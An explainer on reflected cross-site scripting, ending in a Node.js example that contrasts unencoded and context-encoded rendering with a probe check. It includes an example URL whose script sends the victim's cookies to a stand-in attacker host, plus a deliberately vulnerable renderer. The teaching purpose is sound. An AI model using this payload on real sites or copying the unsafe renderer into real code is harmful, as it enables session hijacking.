Reflected cross-site scripting (XSS) is a vulnerability where an application includes user-supplied input in its HTTP response without proper encoding or sanitization. Unlike stored XSS, reflected XSS payloads are not persisted on the server. Instead, the malicious script is embedded in a crafted URL or form submission, and the server reflects it back in the response, where the victim's browser executes it.
How It Works
The attack begins when an attacker identifies a parameter that is echoed back in the page's HTML. For example, a search page that displays "Results for: [search term]" might render the search term directly into the HTML without encoding. The attacker crafts a URL like https://example.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> and tricks a victim into clicking it through phishing, social engineering, or embedding it on another website.
When the victim clicks the link, their browser sends the request to the legitimate server, which includes the malicious script in the response page. The browser has no way to distinguish the injected script from the legitimate application code because it is served from the trusted domain. The script executes with full access to the page's DOM, cookies, and session data, enabling session hijacking, account takeover, or defacement.
Reflected XSS can occur in various contexts beyond simple HTML injection. If the reflected input lands inside a JavaScript string, an HTML attribute, or a CSS context, different escape sequences are needed to break out and inject executable code. Modern frameworks that auto-encode output have reduced but not eliminated reflected XSS, as developers can still use unsafe rendering functions or inject into contexts where HTML encoding is insufficient.
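The context-dependent encoding described above, as an added example that is not code from the original article: a Node.js search handler's rendering logic, first reflecting `q` unencoded into an HTML body, an attribute and a JavaScript string, then with an encoder chosen per sink. The function names and the probe input are assumptions constructed for this example.

```javascript
// Added example (not from the original article): the same reflected "q"
// parameter rendered into three sinks, unencoded and then context-encoded.

// Encoder for HTML text and double-quoted attribute contexts.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Encoder for a JavaScript string literal inside a <script> block:
// JSON.stringify handles quotes and backslashes; the extra replace stops a
// reflected "</script>" from closing the script element early.
function escapeJsString(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c');
}

// Vulnerable rendering: the search term is dropped into each sink as-is.
function renderUnsafe(q) {
  return `<p>Results for: ${q}</p>
<input name="q" value="${q}">
<script>var term = "${q}";</script>`;
}

// Hardened rendering: each sink uses the encoder for its own context.
function renderSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>
<input name="q" value="${escapeHtml(q)}">
<script>var term = ${escapeJsString(q)};</script>`;
}

// Constructed probe of the shape the article's example URL carries.
const PROBE = '<script>alert(1)</script>';

// True when the raw probe survives into the response unchanged, i.e. the
// page reflects input without encoding for at least one sink.
function reflectsUnencoded(html, probe) {
  return html.includes(probe);
}

module.exports = { escapeHtml, escapeJsString, renderUnsafe, renderSafe, PROBE, reflectsUnencoded };
```

Running `reflectsUnencoded(renderUnsafe(PROBE), PROBE)` returns true while the `renderSafe` variant returns false; a response check of this shape is what a scanner does when it flags a parameter as reflected unencoded.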
Why It Matters
Reflected XSS requires social engineering to deliver the malicious URL to a victim, which makes it slightly less impactful than stored XSS in some risk models. However, it remains a serious vulnerability because it executes in the context of the trusted application's origin. A single reflected XSS finding can enable complete account takeover if session tokens are accessible to JavaScript. Security assessments test every reflected parameter for XSS because the vulnerability is common and the impact is consistently high.